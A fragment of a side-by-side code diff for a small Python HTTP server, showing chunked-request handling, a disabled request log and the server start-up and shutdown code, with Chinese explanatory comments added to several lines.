data = unquote_plus(data.decode(UNICODE_ENCODING, "ignore")) data = unquote_plus(data.decode(UNICODE_ENCODING, "ignore"))
self.data = data self.data = data
elif self.headers.get("Transfer-encoding") == "chunked": elif self.headers.get("Transfer-encoding") == "chunked":
# 处理 chunked 请求
data, line = b"", b"" data, line = b"", b""
count = 0 count = 0
@ -232,10 +258,10 @@ class ReqHandler(BaseHTTPRequestHandler):
self.data = data.decode(UNICODE_ENCODING, "ignore") self.data = data.decode(UNICODE_ENCODING, "ignore")
self.do_REQUEST() self.do_REQUEST() # 处理 POST 逻辑
def log_message(self, format, *args): def log_message(self, format, *args):
return return # 不记录日志
def run(address=LISTEN_ADDRESS, port=LISTEN_PORT): def run(address=LISTEN_ADDRESS, port=LISTEN_PORT):
global _alive global _alive
@ -244,16 +270,17 @@ def run(address=LISTEN_ADDRESS, port=LISTEN_PORT):
_alive = True _alive = True
_server = ThreadingServer((address, port), ReqHandler) _server = ThreadingServer((address, port), ReqHandler)
print("[i] running HTTP server at 'http://%s:%d'" % (address, port)) print("[i] running HTTP server at 'http://%s:%d'" % (address, port))
_server.serve_forever() _server.serve_forever() # 开始监听并处理请求
except KeyboardInterrupt: except KeyboardInterrupt:
_server.socket.close() _server.socket.close() # 关闭服务器
raise raise
finally: finally:
_alive = False _alive = False
if __name__ == "__main__": if __name__ == "__main__":
try: try:
init() init() # 初始化数据库和服务器
run(sys.argv[1] if len(sys.argv) > 1 else LISTEN_ADDRESS, int(sys.argv[2] if len(sys.argv) > 2 else LISTEN_PORT)) run(sys.argv[1] if len(sys.argv) > 1 else LISTEN_ADDRESS,
int(sys.argv[2] if len(sys.argv) > 2 else LISTEN_PORT))
except KeyboardInterrupt: except KeyboardInterrupt:
print("\r[x] Ctrl-C received") print("\r[x] Ctrl-C received") # 捕获 Ctrl-C 终止信号
Loading…
Cancel
Save